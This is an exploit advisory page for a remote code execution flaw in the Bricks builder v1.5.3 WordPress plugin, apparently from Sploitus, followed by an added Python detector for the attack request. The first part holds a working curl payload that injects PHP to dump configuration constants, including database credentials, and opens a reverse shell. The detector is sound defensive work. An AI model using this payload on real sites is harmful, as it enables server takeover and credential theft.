## https://sploitus.com/exploit?id=WPEX-ID:F7C5DD17-800F-42CD-A167-AF06CE183E3D
1. Start with a clean WordPress install
2. Install Bricks builder v1.5.3
3. Enable registrations on the website
4. Register as a new user, log in, and copy the cookies
5. Find a valid postId (e.g. 2, the ID of the Sample Page created by default in new WordPress installations)
6. Send the following request to the server

```shell
curl 'http://example.com/wp-admin/admin-ajax.php' -X POST \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Cookie: INSERT_COOKIES_HERE' \
--data-raw 'action=bricks_save_post&postId=INSERT_POST_ID_HERE&area=content&nonce=0&content=%5B%7B%22id%22%3A%22aaaaaa%22%2C%22name%22%3A%22code%22%2C%22parent%22%3A0%2C%22children%22%3A%5B%5D%2C%22settings%22%3A%7B%22code%22%3A%22%3C%3Fphp%20echo%20%27Pwned%21%20%3Cpre%3E%27%3B%20var%5Fdump%28get%5Fdefined%5Fconstants%28true%29%5B%27user%27%5D%29%3B%20echo%20%27%3C%2Fpre%3E%27%3B%20%24sock%3Dfsockopen%28%27127%2E0%2E0%2E1%27%2C11111%29%3B%20proc%5Fopen%28%27%2Fbin%2Fsh%20%2Di%27%2C%20array%280%3D%3E%24sock%2C%201%3D%3E%24sock%2C%202%3D%3E%24sock%29%2C%20%24pipes%29%3B%20%3F%3E%22%2C%22executeCode%22%3Atrue%7D%2C%22themeStyles%22%3A%5B%5D%7D%5D'
```

7. Open the page: its contents should be replaced with a message reading "Pwned", a dump of all user-defined PHP constants (e.g. database credentials), and a remote shell is opened to 127.0.0.1:11111
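The request in step 6 has a recognisable shape on the server side: a POST to `admin-ajax.php` with `action=bricks_save_post`, a placeholder nonce (`0`), and a `code` element whose `settings` enable `executeCode` and carry a PHP open tag. The script below is an added detection example, not part of the advisory and not Bricks' own code. It assumes a reverse proxy or WAF that records request bodies; the three request records it scans are constructed for the example, and the `analyse_request` and `scan` helpers are hypothetical names chosen here.

```python
"""Flag Bricks 'bricks_save_post' requests that carry executable PHP.

Added example (not from the advisory). It models the audit records a
reverse proxy or WAF might keep for POST requests and checks each for the
pattern described above: action=bricks_save_post, a nonce that is not a
real WordPress nonce, and a 'code' element with executeCode enabled.
"""
import json
import re
from urllib.parse import parse_qs, urlencode

# Constructed sample content arrays in the JSON shape Bricks stores.
# The PHP snippet in the first one is a harmless placeholder.
MALICIOUS_CONTENT = json.dumps([{
    "id": "aaaaaa", "name": "code", "parent": 0, "children": [],
    "settings": {"code": "<?php echo 'constructed sample'; ?>",
                 "executeCode": True},
    "themeStyles": [],
}])
BENIGN_CONTENT = json.dumps([{
    "id": "bbbbbb", "name": "heading", "parent": 0, "children": [],
    "settings": {"text": "Hello"},
    "themeStyles": [],
}])

# Constructed audit records: (client address, request path, form body).
SAMPLE_REQUESTS = [
    ("198.51.100.7", "/wp-admin/admin-ajax.php",
     urlencode({"action": "bricks_save_post", "postId": "2",
                "area": "content", "nonce": "0",
                "content": MALICIOUS_CONTENT})),
    ("203.0.113.9", "/wp-admin/admin-ajax.php",
     urlencode({"action": "bricks_save_post", "postId": "2",
                "area": "content", "nonce": "1a2b3c4d5e",
                "content": BENIGN_CONTENT})),
    ("203.0.113.9", "/wp-admin/admin-ajax.php",
     urlencode({"action": "heartbeat", "_nonce": "1a2b3c4d5e"})),
]

# WordPress nonces are 10 lowercase hex characters; "0" cannot be one.
NONCE_FORMAT = re.compile(r"[0-9a-f]{10}")


def parse_body(body: str) -> dict:
    """Flatten an application/x-www-form-urlencoded body to single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def code_elements(content_json: str):
    """Yield the Bricks elements of type 'code' from a saved content array."""
    try:
        elements = json.loads(content_json)
    except json.JSONDecodeError:
        return
    if not isinstance(elements, list):
        return
    for element in elements:
        if isinstance(element, dict) and element.get("name") == "code":
            yield element


def analyse_request(path: str, body: str) -> list:
    """Return a list of findings for one request; empty means nothing suspicious."""
    findings = []
    if not path.endswith("/wp-admin/admin-ajax.php"):
        return findings
    fields = parse_body(body)
    if fields.get("action") != "bricks_save_post":
        return findings
    nonce = fields.get("nonce", "")
    if not NONCE_FORMAT.fullmatch(nonce):
        findings.append(f"invalid nonce {nonce!r}")
    for element in code_elements(fields.get("content", "")):
        settings = element.get("settings", {})
        if settings.get("executeCode") is True:
            findings.append(
                f"code element {element.get('id')} with executeCode enabled")
        if "<?php" in settings.get("code", ""):
            findings.append(f"code element {element.get('id')} contains PHP")
    return findings


def scan(records) -> list:
    """Return (client, findings) for every record that produced a finding."""
    hits = []
    for client, path, body in records:
        findings = analyse_request(path, body)
        if findings:
            hits.append((client, findings))
    return hits


if __name__ == "__main__":
    for client, findings in scan(SAMPLE_REQUESTS):
        print(client)
        for finding in findings:
            print("  -", finding)
```

The nonce check alone catches the request as written in the advisory, but the `executeCode` and PHP-tag checks are the ones worth keeping: a low-privileged account that obtains a valid nonce from the editor still has no business saving a code element that executes on the front end, so those findings should alert regardless of the nonce's validity.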